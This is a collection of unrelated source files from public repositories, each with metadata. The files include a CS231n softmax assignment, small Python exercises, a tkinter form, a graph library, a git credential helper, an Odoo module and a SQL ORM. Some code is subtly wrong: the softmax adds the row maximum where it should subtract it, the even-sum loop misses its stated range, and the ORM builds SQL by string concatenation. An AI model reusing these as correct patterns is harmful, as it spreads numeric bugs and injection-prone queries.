872a1c04e4e3be70b6fb3ffad70aed3ecf9ae066 | 2bad2905a23258f3bb4150b9e12e6718ed95f2b0 | /demo5/app/models.py | 31b29bc96ceb3265f32837c9466a99a6576f02d2 | [] | no_license | arar456456/django | 7f859232f387301344dbd60cea41528629ef4abb | 58814c587ff0202d57a132f4423de2b70afd792a | refs/heads/master | 2022-11-26T12:29:12.879068 | 2020-08-02T11:02:51 | 2020-08-02T11:04:03 | 284,438,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 228 | py | from django.db import models
from mongoengine import *
# Create your models here.
class Inmassage(Document):
uid = SequenceField()
name = StringField(max_length=30, required=True)
habit = StringField(max_length=30)
| [
"489303532@qq.com"
] | 489303532@qq.com |
2db5c1354b70d24e121f034a8a8dbae8033e8a58 | cbdd47c42a3a0d1fe3a8f3480e9a07fd166ecd8b | /2018/assignment1/cs231n/classifiers/softmax.py | 6a579093f89e2ce113a65d9e63200ca975c42a0a | [] | no_license | RuisongZhou/CS231N_2018 | beb8aa526a4f1744b2473584c4306924b9df7a48 | 9e1bfa1aedc0146ccb3a20c65d312f629ae4bdce | refs/heads/master | 2020-04-13T19:53:06.963490 | 2018-12-28T13:49:32 | 2018-12-28T13:49:32 | 163,414,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,956 | py | import numpy as np
from random import shuffle
def softmax_loss_naive(W, X, y, reg):
"""
Softmax loss function, naive implementation (with loops)
Inputs have dimension D, there are C classes, and we operate on minibatches
of N examples.
Inputs:
- W: A numpy array of shape (D, C) containing weights.
- X: A numpy array of shape (N, D) containing a minibatch of data.
- y: A numpy array of shape (N,) containing training labels; y[i] = c means
that X[i] has label c, where 0 <= c < C.
- reg: (float) regularization strength
Returns a tuple of:
- loss as single float
- gradient with respect to weights W; an array of same shape as W
"""
# Initialize the loss and gradient to zero.
loss = 0.0
dW = np.zeros_like(W)
num_classes = W.shape[1] #10
num_train = X.shape[0]
#############################################################################
# TODO: Compute the softmax loss and its gradient using explicit loops. #
# Store the loss in loss and the gradient in dW. If you are not careful #
# here, it is easy to run into numeric instability. Don't forget the #
# regularization! #
#############################################################################
scores = X.dot(W)
maxLog = np.max(scores, axis =1)
#print("取最大")
#print(maxLog.shape)
maxLog = np.reshape(np.repeat(maxLog, num_classes), scores.shape)
#print("重新转换后")
#print(maxLog)
expScores = np.exp(scores+maxLog)
#print(expScores)
#loss and gradient implement
for i in range(num_train):
# substract maxnium to make the exp standard
esum=sum(expScores[i])
eyi = expScores[i,y[i]]
li = -np.log(eyi / esum)
loss+=li
for j in range(num_classes):
dW[:,j]+=(expScores[i,j]/esum)*X[i]
dW[:,y[i]] -= X[i]
loss /= num_train
loss += 0.5*reg * np.sum(W*W)
dW /= num_train
dW += reg * W
#############################################################################
# END OF YOUR CODE #
#############################################################################
return loss, dW
def softmax_loss_vectorized(W, X, y, reg):
"""
Softmax loss function, vectorized version.
Inputs and outputs are the same as softmax_loss_naive.
"""
# Initialize the loss and gradient to zero.
loss = 0.0
dW = np.zeros_like(W)
num_classes = W.shape[1] #10
num_train = X.shape[0]
#############################################################################
# TODO: Compute the softmax loss and its gradient using no explicit loops. #
# Store the loss in loss and the gradient in dW. If you are not careful #
# here, it is easy to run into numeric instability. Don't forget the #
# regularization! #
#############################################################################
scores=X.dot(W)
maxLogC = np.max(scores,axis=1)
maxLogC=np.reshape(np.repeat(maxLogC,num_classes),scores.shape )
expScores=np.exp(scores+maxLogC)
exp_correct_class_score = expScores[np.arange(num_train), y]
##计算loss
loss=-np.log(exp_correct_class_score/np.sum(expScores,axis=1))
loss=sum(loss)/num_train
loss+=0.5*reg*np.sum(W*W)
##计算gradient
expScoresSumRow=np.reshape(np.repeat(np.sum(expScores,axis=1),num_classes),expScores.shape )
#expScoresSumRow.shape 为(500,10)
graidentMatrix=expScores/ expScoresSumRow
#对于yi要-1,就是loss的偏导数
graidentMatrix[np.arange(num_train),y]-=1
dW = X.T.dot(graidentMatrix)
dW/=num_train
dW+=reg*W
#############################################################################
# END OF YOUR CODE #
#############################################################################
return loss, dW
| [
"811437508@qq,com"
] | 811437508@qq,com |
ceadd39f58e3cdd2956e37c2b347fd9cdd1e0a75 | cdc91518212d84f3f9a8cd3516a9a7d6a1ef8268 | /python/eve_number_sum.py | 02fbfe2554068c956fce71f67dc342dbab849094 | [] | no_license | paulfranco/code | 1a1a316fdbe697107396b98f4dfe8250b74b3d25 | 10a5b60c44934d5d2788d9898f46886b99bd32eb | refs/heads/master | 2021-09-20T14:00:35.213810 | 2018-08-10T06:38:40 | 2018-08-10T06:38:40 | 112,060,914 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | # write a function that adds all of of the even numbers from 0 - 26
def my_func():
my_sum = 0
for x in range(0, 25):
if x % 2 == 0:
my_sum = my_sum + x
print(my_sum)
my_func() | [
"paulfranco@me.com"
] | paulfranco@me.com |
f79071c1101882953d6653f2c695c93cb32e2ba8 | 40e8e2e7a31357ecc2c5b53c4b32c9642b9dac4e | /gui/lekar/zahtev_za_pregled_lop.py | c8176fbd3984e59081878828bba19ab13dd5ffbe | [] | no_license | Raffayet/HospitalApplication | ef7c6f9dddd3826d47500bf92839d3d47305b37e | a119537b33407f7f1b50446f87ebbc27e67ade8b | refs/heads/master | 2023-08-24T00:09:05.636769 | 2021-10-09T12:08:46 | 2021-10-09T12:08:46 | 415,380,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,642 | py | from model.dto.dogadjaji_dto.zakazivanje_pregleda_kod_spec_dto import ZakazivanjePregledaKodSpecijalisteDTO
from servis.kalendar.kalendar_servis import KalendarServis
from servis.korisnik.korisnik_servis import KorisnikServis
from model.enum.tip_lekara import TipLekara
from tkinter import ttk, messagebox
from tkinter import *
import datetime
class ZahtevZaPregledKodSpecijaliste:
def __init__(self, root, pacijent):
self._root = root
self._root.title('Zakazivanje pregleda za ' + pacijent)
self._pacijent = pacijent
self._specijalista = StringVar(self._root)
self._lista_specijalista = KorisnikServis().vrati_lekare_specijaliste_ili_lop(TipLekara.SPECIJALISTA)
self._specijalista.set(self._lista_specijalista[0])
self._pocetni_datum = ttk.Entry(self._root)
self._krajnji_datum = ttk.Entry(self._root)
self._vreme_pocetka = ttk.Entry(self._root)
self._vreme_zavrsetka = ttk.Entry(self._root)
self.izaberi_pocetni_krajnji_datum()
self.izaberi_specijalistu()
ttk.Button(self._root, text="Potvrdi", command=self.provera_unosa).grid(row=5, column=1, sticky=E, padx=10,
pady=20)
def izaberi_pocetni_krajnji_datum(self):
Label(self._root, text='Pregled treba da se odrzi\nu sledecem vremenskom periodu:', font='Console 11').grid(
row=0, column=0, sticky=W, pady=10, padx=10)
Label(self._root, text='OD (dd/mm/gggg): ').grid(row=1, column=0, sticky=E, pady=5)
self._pocetni_datum.grid(row=1, column=1, sticky=W)
Label(self._root, text='DO (dd/mm/gggg): ').grid(row=2, column=0, sticky=E)
self._krajnji_datum.grid(row=2, column=1, sticky=W)
def izaberi_specijalistu(self):
Label(self._root, justify=LEFT, text="Specijalista:", font="Console 11").grid(row=3, sticky=W, column=0,
pady=10, padx=10)
default = self._specijalista.get()
specijalista_OptionMenu = ttk.OptionMenu(self._root, self._specijalista, default, *self._lista_specijalista)
specijalista_OptionMenu.grid(row=3, column=1, pady=10)
def provera_unosa(self):
if not self.provera_datuma():
messagebox.showerror("GRESKA", "Los format datuma! (DD/MM/GGGG")
else:
self.salji_notifikaciju_sekretaru()
def provera_datuma(self):
try:
d, m, g = self._pocetni_datum.get().split("/")
self._datum_pocetka = datetime.date(int(g), int(m), int(d))
d, m, g = self._krajnji_datum.get().split("/")
self._datum_zavrsetka = datetime.date(int(g), int(m), int(d))
if self._datum_pocetka < datetime.date.today() or self._datum_zavrsetka < self._datum_pocetka:
return False
except ValueError:
return False
return True
def salji_notifikaciju_sekretaru(self):
zakazivanjeDTO = ZakazivanjePregledaKodSpecijalisteDTO(self._datum_pocetka, self._datum_zavrsetka,
self._specijalista.get(), self._pacijent)
KalendarServis().posalji_zahtev_za_pregled_kod_specijaliste(zakazivanjeDTO)
messagebox.showinfo('USPESNO', 'Uspesno ste zakazali operaciju')
self._root.destroy()
def poziv_forme_zahtev_za_pregled_lop(korisnicko_ime_pacijenta):
root = Tk()
root.geometry('550x240')
application = ZahtevZaPregledKodSpecijaliste(root, korisnicko_ime_pacijenta)
root.mainloop()
| [
"soviljnikola3@gmail.com"
] | soviljnikola3@gmail.com |
5d8f24ea66b58048348f8f8f95f24941eae56322 | 86cac85def7eaca88c2a8b87136bd8c7811d2f06 | /graffiti/legacy/core.py | 39ee9248285cd54a67a972d8efe05226fc522a35 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | suimong/graffiti | 54bce6c6038a622cb62bfc5daa3f15cceffe52eb | 54a1b950d8b1181b407c3c2675bbfac45436a525 | refs/heads/master | 2021-05-27T19:04:34.069028 | 2014-06-10T02:56:27 | 2014-06-10T02:56:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,399 | py | #!/usr/bin/env python
# Copyright (c) 2014 Michael-Keith Bernard
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from graffiti import util
from graffiti.legacy import keys
from graffiti.legacy import strategy
__author__ = "Michael-Keith Bernard"
class GraphError(Exception):
pass
def build_nodes(graph):
"""Gather function metadata for graph nodes"""
acc = {}
for k, v in graph.iteritems():
if callable(v):
acc[k] = util.fninfo(v)
else:
acc[k] = v
return acc
def deps_for(nodes, key):
"""Find all dependencies for a key in a given graph"""
def _deps(key, path):
if key not in nodes:
return [key]
if key in path:
msg = "Cycle detected between {} and {}".format(
path[0], path[-1])
raise GraphError(msg)
deps = nodes[key]["required"]
trans = [_deps(dep, path + [key]) for dep in deps]
return set(util.concat(deps, *trans))
return _deps(key, [])
def build_dependency_tree(nodes):
"""Find all dependencies for all keys in a given graph"""
return { k: deps_for(nodes, k) for k in nodes.keys() }
def graph_parameters(nodes):
"""Gather all required and optional inputs and outputs."""
out = set(nodes)
rin, oin = set(), set()
for node in nodes.values():
rin |= node["required"]
oin |= set(node["optional"])
return (rin - out, oin, out)
def graph_nodes(dependencies):
"""Find all nodes referenced by this graph"""
return set.union(set(dependencies), *dependencies.values())
def compile_graph(descriptor):
"""Compile a graph descriptor into a graph"""
nodes = build_nodes(keys.simplify(descriptor))
deps = build_dependency_tree(nodes)
node_names = graph_nodes(deps)
req, opt, out = graph_parameters(nodes)
return {
"descriptor": descriptor,
"nodes": nodes,
"dependencies": deps,
"required_inputs": req,
"optional_inputs": opt,
"outputs": out,
"node_names": node_names,
}
def call_graph(graph, key, inputs):
"""Call a node in the graph with the correct subset of required and optional
keys from the inputs
"""
node = graph["nodes"][key]
acceptable = node["required"] | set(node["optional"])
req = util.select_keys(lambda k, _: k in acceptable, inputs)
args = util.merge(node["optional"], req)
return node["fn"](**args)
def run_once(graph, inputs, required=None):
"""Evaluate a single set of satisfiable dependecies. `required` is the set
of keys that should be evaluated, or None for all keys
"""
if required and set(inputs) >= required:
return inputs
sat = strategy.satisfied_by(graph["nodes"], inputs)
if required:
sat &= set(required)
new_vals = { k: call_graph(graph, k, inputs) for k in sat }
return util.merge(inputs, new_vals)
def run_graph(graph, inputs, *keys):
"""Run a graph given a set of inputs and, optionally, a subset of keys from
the graph
"""
if inputs is None:
inputs = {}
required = strategy.find_requirements(graph, inputs, keys)
runner = lambda inputs: run_once(graph, inputs, required)
solved = util.fixpoint(runner, inputs)
if set(solved) < required:
raise GraphError("Unsatisfiable dependencies")
return solved
| [
"mkbernard.dev@gmail.com"
] | mkbernard.dev@gmail.com |
088fac80d39437e75d6fcde58165b95188fc7a81 | c5fb0f108dc0a99adf772b075a3f3fc487a92a40 | /Homeworks/hw1/hw1_part3.py | a0e9b3bf6aea63168967d36c0932c8dfa206f84d | [] | no_license | ujjwalrehani/Various-Python-Projects | 7e86eed01eb4716f1946d6082b9c319d0021c7ba | 00950d669f3536fab061c167918bd8755c694b8f | refs/heads/master | 2021-09-04T03:06:20.605344 | 2018-01-15T02:17:17 | 2018-01-15T02:17:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | # File: hw1_part3.py
# Author: Ujjwal Rehani
# Date: 2/9/2017
# Section: 21
# E-mail: urehani1@umbc.edu
# Description:
# Prints out the name of a dog
def main():
dogName = input("What is the name of your dog? ")
print(dogName,"is a good dog!")
main() | [
"noreply@github.com"
] | noreply@github.com |
a2c60ae4eba6bb1bd7bc7d9d5bb25bc5a6ea9707 | 4f875744ccae8fa9225318ce16fc483b7bf2735e | /google/thief.py | 784a8691a8ab6fa23fd45c46215f40a55bbe01b8 | [] | no_license | nguyenngochuy91/companyQuestions | 62c0821174bb3cb33c7af2c5a1e83a60e4a29977 | c937fe19be665ba7ac345e1729ff531f370f30e8 | refs/heads/master | 2020-07-27T05:58:36.794033 | 2020-04-10T20:57:15 | 2020-04-10T20:57:15 | 208,893,527 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 854 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 11 02:40:47 2019
@author: huyn
"""
#House thief
def findMax(array):
def dfs(index,currentSum):
if index>=len(array):
return currentSum
else:
val = array[index]
first = dfs(index+1,currentSum)
second = dfs(index+2,currentSum+val)
return max(first,second)
return dfs(0,0)
#print(findMax([2, 5, 1, 3, 6, 2, 4]))
#print(findMax([2, 10, 14, 8, 1]))
def findMaxDP(array):
dp = [0]*len(array)
def dfs(index):
if index<len(array):
if dp[index]==0:
dp[index] = max(array[index]+dfs(index+2),dfs(index+1))
return dp[index]
else:
return 0
dfs(0)
return dp[0]
print(findMaxDP([2, 5, 1, 3, 6, 2, 4]))
print(findMaxDP([2, 10, 14, 8, 1])) | [
"huyn@cvm6h4zv52.cvm.iastate.edu"
] | huyn@cvm6h4zv52.cvm.iastate.edu |
2b21fb9ae2fb93f790d20b26464fd232360fec12 | 609e436525e2edde0c72a90f49c49adf23ec7771 | /bin/git-credential-mvl | 3d0fc421d5ae518820fc531163428b2af5fcffcb | [] | no_license | MontaVista-OpenSourceTechnology/opencgx-qemu-4.14-2.4 | 78ed77440969c160cf474d6d02f9e718c5a9d4ff | d4fcc7ab1e5f653dce84475621f6bc6bf907460f | refs/heads/master | 2021-04-09T15:20:18.731769 | 2019-09-20T04:21:30 | 2019-09-20T04:21:30 | 125,580,162 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,699 | #!/usr/bin/env python
#
# Copyright (c) 2009-2018 MontaVista Software, LLC. All rights reserved.
#
# This file is licensed under the terms of the GNU General Public License
# version 2. This program is licensed "as is" without any warranty of any
# kind, whether express or implied.
#
from optparse import OptionParser, OptionGroup
import sys
from MVLContent.MVLContentTools import ContentTools, getUserFromPasswordManager, removeUserFromPasswordManager
import logging
def main():
parser = OptionParser()
parser.add_option("--username", dest="username", default=None, help="set username", metavar="<username>")
parser.add_option("--password", dest="password", default=None, help="set password", metavar="<password>")
parser.add_option("-d", "--debug", action="store_true", dest="isDebug", default=False, help="print debug messages")
# parser all arguments
(options,arguments) = parser.parse_args()
# setup logger
logger = logging.getLogger("git-credential-mvl")
ch = logging.StreamHandler()
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
if len(arguments) > 1:
sys.stderr.write("Too many arguments")
else:
operation = arguments[0]
#Set defaults
protocol=None
host=None
username=None
password=None
# Parse input from git
for line in sys.stdin.readlines():
if line.startswith("protocol="):
protocol = line.split("=")[1].strip()
if line.startswith("host="):
host = line.split("=")[1].strip()
if line.startswith("password="):
password = line.split("=")[1].strip()
if line.startswith("username="):
username = line.split("=")[1].strip()
if protocol and host:
options.uri="%s://%s" % (protocol, host)
else:
sys.stderr.write("Didn't get host or protocol values\n")
sys.exit(1)
if username:
options.username = username
if password:
options.password = password
contentTools = ContentTools(options)
user = getUserFromPasswordManager(logger)
if operation == "get":
if user:
print("username={0}".format(user.getUsername()))
print("password={0}".format(user.getPassword()))
elif operation == "store":
getUserFromPasswordManager(logger)
elif operation == "erase":
if user:
removeUserFromPasswordManager(user,logger)
else:
print "Invalid git operation"
if __name__ == "__main__":
main()
| [
"jpuhlman@mvista.com"
] | jpuhlman@mvista.com | |
75255d7bcc26d834bc28fb695b7bbfa7b76cdbd3 | 3f2cdb121443859eb029b348ca1493b196c12732 | /basic-mathematical-operations.py | 93182d0818aad204834859bc0a03b80ddbe9ed76 | [] | no_license | c0ns0le/coding-puzzles | ef31d78dc7b5df72415930be55b555c888a5e790 | e15aec28a679f3298a30fd64ee6cf4c2d27350f1 | refs/heads/master | 2020-04-04T17:49:47.445579 | 2018-10-01T01:05:23 | 2018-10-01T01:05:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | # Basic Mathematical Operations: 8 KYU
# Your task is to create a function that does four basic mathematical operations.
# The function should take three arguments - operation(string/char), value1(number), value2(number).
# The function should return result of numbers after applying the chosen operation.
def basic_op(operation, value1, value2):
if operation == "+": return value1 + value2
if operation == "-": return value1 - value2
if operation == "*": return value1 * value2
if operation == "/": return value1 / value2
print(basic_op('+', 4, 7)) # 11
print(basic_op('-', 15, 18)) # -3
print(basic_op('*', 5, 5)) # 25
print(basic_op('/', 49, 7)) # 7
| [
"ali07cat07@gmail.com"
] | ali07cat07@gmail.com |
0bc2774a6e2cb8b814c0c550dee7cc21c4f335d3 | 9a4fbcc3736521bc4f5d9e483f8c8a996044e31c | /bss_crm_phonenumbers/models/crm_lead.py | 12cfd7787b66716d85ce36686e825e6bd0b4f6b3 | [] | no_license | bluestar-solutions/openerp-bss-phonenumbers-addons | 353cd82c5a97e9447cab6d8a3479814a69d4718a | b9eeff666063f1d269ed50de6bfe0e3882b4f2f5 | refs/heads/master | 2020-05-19T16:32:11.052093 | 2019-10-02T13:41:02 | 2019-10-02T13:41:02 | 35,479,882 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | # -*- coding: utf-8 -*-
# Part of CRM Phone Numbers.
# See LICENSE file for full copyright and licensing details.
from odoo import models
from odoo.addons.bss_phonenumbers import fields # @UnresolvedImport
class Lead(models.Model):
_inherit = 'crm.lead'
phone = fields.Phone("Phone")
mobile = fields.Phone("Mobile")
fax = fields.Phone("Fax")
| [
"herve.martinet@bluestar.solutions"
] | herve.martinet@bluestar.solutions |
b51cd3b37da09322d7f9b8aafe925465055d0aec | 3090557f9979c7c36490949b27012e245c65ff67 | /advanced_routing/server.py | b77caaa0255cf2c82b665936632272349eda3fae | [] | no_license | Biniamguchi/Flask | 859113d8dd3a664180cd2ad5ac39d7efec48a7ed | c932ab8aafd217508a393cfbc4c93737e9de1820 | refs/heads/master | 2021-08-24T07:56:17.475002 | 2017-12-08T18:40:58 | 2017-12-08T18:40:58 | 109,214,346 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template("user.html", phrase="hello", times=10)
app.run(debug=True)
# from flask import Flask, render_template, request, redirect
# app = Flask(__name__)
# @app.route('/users/<jay>')
# def show_user_profile(jay):
# print jay
# return render_template("user.html")
# app.run(debug=True) | [
"biniam22@gmail.com"
] | biniam22@gmail.com |
253bd22eeac212547fe5cd4922cf478d51db7277 | f41bdcf118ce9c4ba374a33475fd9626bf3db905 | /klasa 1/sql/fake_apps/fake_apps.py | 52604f726248f8628828457684969c3287274991 | [] | no_license | nikolaCh6/nikolaCh6 | 376005812dc49b5c41af95ef0c1b8d3caed7a21d | 5c60aa63bd37c8594ce09b60d32f8cd1b0941e9b | refs/heads/master | 2021-06-16T11:30:21.837301 | 2019-10-18T10:53:59 | 2019-10-18T10:53:59 | 105,507,076 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sqlite3
import csv
def dane_z_pliku(nazwa_pliku):
dane = [] # pusta lista na dane
with open(nazwa_pliku, 'r', newline='', encoding='utf-8') as plik:
tresc = csv.reader(plik, delimiter='\t')
for rekord in tresc:
rekord = [x.strip() for x in rekord] # oczyszczamy dane
dane.append(rekord) # dodawanie rekordów do listy
return dane
def kwerenda_1(cur):
cur.execute("""
SELECT * FROM fake_apps
""")
wyniki = cur.fetchall() # pobranie wszystkich rekordów
for row in wyniki: # odczytywanie rekordów
print(tuple(row)) # drukowanie pól
def main(args):
con = sqlite3.connect('fake_apps.db') # połączenie z bazą
cur = con.cursor() # utworzenie kursora
# utworzenie tabeli w bazie
with open('fake_apps.sql', 'r') as plik:
cur.executescript(plik.read())
# dodawanie danych do bazy
fake_apps = dane_z_pliku('fake_apps.txt')
fake_apps.pop(0) # usuń pierwszy rekord z listy
cur.executemany('INSERT INTO fake_apps VALUES(?, ?, ?, ?, ?)', fake_apps)
kwerenda_1(cur)
con.commit() # zatwierdzenie zmian w bazie
con.close() # zamknięcie połączenia z bazą
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
| [
"nikolachmiel6@gmail.com"
] | nikolachmiel6@gmail.com |
99fe4cfdf0cb813cd50858f019141ceab71fce96 | 6dca81c7387ec92144dd1908855589e1c92c4057 | /IutyLib/database/dbbase.py | ae083623aeb6a563ee9698c015d896406a823d3a | [
"MIT"
] | permissive | Iuty/iutylib | bf2010712e3c9d31f00b3ed1bd0d16ec9c5f6350 | 763972642c536aeec352001e649a884784d19a40 | refs/heads/master | 2023-01-23T13:51:01.365025 | 2020-11-19T06:43:43 | 2020-11-19T06:43:43 | 218,896,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,176 | py | from IutyLib.database.exceptions import *
from abc import abstractmethod
import datetime
class DataBaseParam:
host = None
user = None
password = None
dbname = None
def __init__(self,host,user,password,dbname,port=3306):
self.host = host
self.user = user
self.port = port
self.password = password
self.dbname = dbname
pass
class Column:
AutoIncrement = False
PrimaryKey = False
IsIndex = False
UnionIndex = False
IsUnique = False
NullAble = True
Length = None
Default = None
Enum = []
Type = int
def __init__(self,**kwargs):
if 'AutoIncrement' in kwargs:
self.AutoIncrement = kwargs['AutoIncrement']
if 'NullAble' in kwargs:
self.NullAble = kwargs['NullAble']
if 'PrimaryKey' in kwargs:
self.PrimaryKey = kwargs['PrimaryKey']
if self.PrimaryKey:
self.NullAble = False
if 'IsIndex' in kwargs:
self.IsIndex = kwargs['IsIndex']
if 'UnionIndex' in kwargs:
self.UnionIndex = kwargs['UnionIndex']
if 'IsUnique' in kwargs:
self.IsUnique = kwargs['IsUnique']
if 'Length' in kwargs:
self.Length = kwargs['Length']
if 'Default' in kwargs:
self.Default = kwargs['Default']
if 'Enum' in kwargs:
self.Enum = kwargs['Enum']
if 'Type' in kwargs:
self.Type = kwargs['Type']
def getType(self):
if not self.Length == None:
length = str(self.Length)
if self.Type == int:
if self.Length == None:
length = "11"
return "int" + "(" + length + ")"
if self.Type == float:
return "float"
if self.Type == str:
if self.Length == None:
length = "255"
t = "varchar" + "(" + length + ")"
if len(self.Enum) > 0:
t = "enum("
enumstr = ""
for e in self.Enum:
if len(enumstr) > 0:
enumstr += ','
enumstr += ("\'" + e + "\'")
t += enumstr
t += ")"
return t
if self.Type == datetime.date:
return "date"
if (self.Type == datetime.timedelta) | (self.Type == datetime.time):
if self.Length == None:
length = "6"
return "time" + "(" + length + ")"
if self.Type == datetime.datetime:
if self.Length == None:
length = "6"
return "datetime" + "(" + length + ")"
if self.Type == bytes:
if self.Length == None:
length = "255"
return "varchar" + "(" + length + ")"
def getSqlStr(self):
colstr = ""
colstr += (" " + self.getType())
if self.PrimaryKey:
colstr += " primary key"
self.NullAble = False
if not self.NullAble:
colstr += " not null"
if (self.Default is None) & (self.NullAble):
colstr += " default NULL"
if not self.Default is None:
colstr += (" Default" + '\'' + self.Default + '\'')
if self.AutoIncrement:
colstr += " AUTO_INCREMENT"
return colstr
pass
class SqlDataBase(DataBaseParam):
_db = None
def __init__(self,host,user,password,dbname,port=3306,**kwargs):
DataBaseParam.__init__(self,host,user,password,dbname,port)
self.Model = self.getModel.__call__()
self._dbname = dbname
pass
def getModel(self):
class Model:
_db = self
def getColumns(self):
columns = {}
for item in self.__class__.__dict__:
if self.__class__.__dict__[item].__class__ == Column:
columns[item] = self.__class__.__dict__[item]
return columns
def getDBColumns(self):
tablename = self.__class__.__name__
return self._db.getColumnDefine(tablename)
def checkColumn(self):
columns = self.getColumns()
dbcolumns = self.getDBColumns()
for col in columns:
if col.startswith('_'):
continue
column = columns[col]
checkok = False
for dbcolumn in dbcolumns:
if dbcolumn['column_name'] == col:
if column.getType() != dbcolumn['COLUMN_TYPE']:
self._db.alterColumn(self.__class__.__name__,col,column.getSqlStr())
checkok = True
continue
nullable = 'YES'
if not column.NullAble:
nullable = 'NO'
if nullable != dbcolumn['IS_NULLABLE']:
self._db.alterColumn(self.__class__.__name__,col,column.getSqlStr())
checkok = True
continue
checkok = True
continue
if not checkok:
print(col)
self._db.addColumn(self.__class__.__name__,col,column.getSqlStr())
def check(self,**kwargs):
self.creat()
self.checkColumn()
pass
def creat(self,**kwargs):
if self._db.isTableExists(self.__class__.__name__):
return
kwargs['table'] = self.__class__.__name__.lower()
columns = self.getColumns()
for column in columns:
if not 'columns' in kwargs:
kwargs['columns'] = {}
kwargs['columns'][column] = columns[column]
data = self._db.excuteCreat.__call__(**kwargs)
return data
def query(self,**kwargs):
kwargs['table'] = self.__class__.__name__.lower()
data = self._db.excuteQuery.__call__(**kwargs)
return data
def add(self,**kwargs):
kwargs['table'] = self.__class__.__name__.lower()
data = self._db.excuteAdd.__call__(**kwargs)
return data
def delete(self,**kwargs):
kwargs['table'] = self.__class__.__name__.lower()
data = self._db.excuteDelete.__call__(**kwargs)
return data
def update(self,**kwargs):
kwargs['table'] = self.__class__.__name__.lower()
data = self._db.excuteUpdate.__call__(**kwargs)
return data
def drop(self,**kwargs):
kwargs['table'] = self.__class__.__name__.lower()
data = self._db.excuteDrop.__call__(**kwargs)
return data
def tables(self,**kwargs):
data = self._db.excuteTableInfo.__call__(**kwargs)
return data
return Model
def isTableExists(self,tablename):
sqlstr = "select table_name from information_schema.tables where table_schema=\'"
sqlstr += self.dbname
sqlstr += '\' and table_type=\'base table\''
sqlstr += ' and table_name ='
sqlstr += (" \'" + tablename + "\'")
#print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
if len(data) > 0:
return True
return False
def getColumnDefine(self,tablename):
sqlstr = "select column_name,COLUMN_TYPE,COLUMN_KEY,IS_NULLABLE from information_schema.columns where table_schema= "
sqlstr += ("\'" + self.dbname + "\'")
sqlstr += " and table_name = "
sqlstr += ("\'" + tablename + "\'")
#log here
#print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def alterColumn(self,tablename,columnname,alterstr):
sqlstr = "alter table"
sqlstr += (' `' + tablename + '`')
sqlstr += " Modify Column"
sqlstr += (' `' + columnname + '`')
sqlstr += (' ' + alterstr)
#log here
#print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def addColumn(self,tablename,columnname,alterstr):
sqlstr = "alter table"
sqlstr += (' `' + tablename + '`')
sqlstr += " Add Column"
sqlstr += (' `' + columnname + '`')
sqlstr += (' ' + alterstr)
#log here
print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteCreat(self,**kwargs):
sqlstr = "CREATE TABLE "
if not 'table' in kwargs:
raise TableError('Creat Has No Table')
sqlstr += ("`" + kwargs['table'] + "`")
if not 'columns' in kwargs:
raise TableError('Creat Has No Column')
colstr = ""
indexstr = ""
unionindexstr = ""
for col in kwargs['columns']:
colobj = kwargs['columns'][col]
if len(colstr) > 0:
colstr += ','
colstr += ("`" + col + "`")
colstr += colobj.getSqlStr()
if colobj.IsIndex:
if not colobj.UnionIndex:
indexstr += ("," + "Index" + " " + "`" + col + "`" + " " + "(`" + col + "`)")
else:
if len(unionindexstr) > 0:
unionindexstr += ","
unionindexstr += ("`" + col + "`")
if len(unionindexstr) > 0:
unionindexstr = "," + "Index" + " " + "`union`" + " " + "(" + unionindexstr + ")"
sqlstr += ("(" + colstr + indexstr + unionindexstr +")")
#log here
#print(sqlstr)
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteDrop(self,**kwargs):
sqlstr = "DROP TABLE"
if not 'table' in kwargs:
raise TableError('Drop Has No Table')
sqlstr += ("`" + kwargs['table'] + "`")
db0 = self.excuteSql(sqlstr)
data = []
for d in db0:
data.append(d)
return data
def excuteTableInfo(self,**kwargs):
